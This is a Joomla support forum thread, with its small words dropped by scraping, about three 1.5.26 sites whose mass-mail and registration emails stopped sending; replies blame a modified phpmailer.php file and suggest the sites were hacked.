Add User / Mass Mail email sending problem - Joomla! Forum - community, help and support

i have 3 1.5.26 sites working fine until 10 days ago. there have been no changes these sites since april 2012 when upgraded 1.5.26. 7 10 days ago advised of problem tools -> mass mail option. when submit / send mail button clicked screen refreshed blank screen , no mails sent / received.

there similar problem (also of 7 10 days ago) when adding new user either on front end site create login option or in end user manager - add user. when new user request submitted screen refreshes blank screen , registration email not set. new user has been added database.

after lot of discussion server host (webhosting.uk.com) have told me there problem phpmailer.php file , should reinstall or upgrade (see latest email below). seems highly unlikely me 3 phphmailer.php files (on 3 separate joomla installations hosted on same server), have been working fine until 7 - 10 days ago, have been corrupted or failed in same way @ same time. seems more has changed on php configuration on server?

the email configuration in global configuration on 3 joomla installations set use smtp host provider no longer supports php mail. have been set use smtp sometime , working fine until now.

any ideas / suggestions / solutions please ...... i'm @ wits end!!!

it seems problem phpmailer plugin file. when commented below lines in libraries/phpmailer/phpmailer.php works fine.

you need reinstall/upgrade phpmailer plugin joomla.

please let know need further assistance. more happy assist further this.

the original file libraries/phpmailer/phpmailer.php has 1909 lines. more site has been hacked. more files may have been tampered with.

you need go security forum , follow instructions in sticky notices @ top rid of possible changes made sites: viewforum.php?f=432
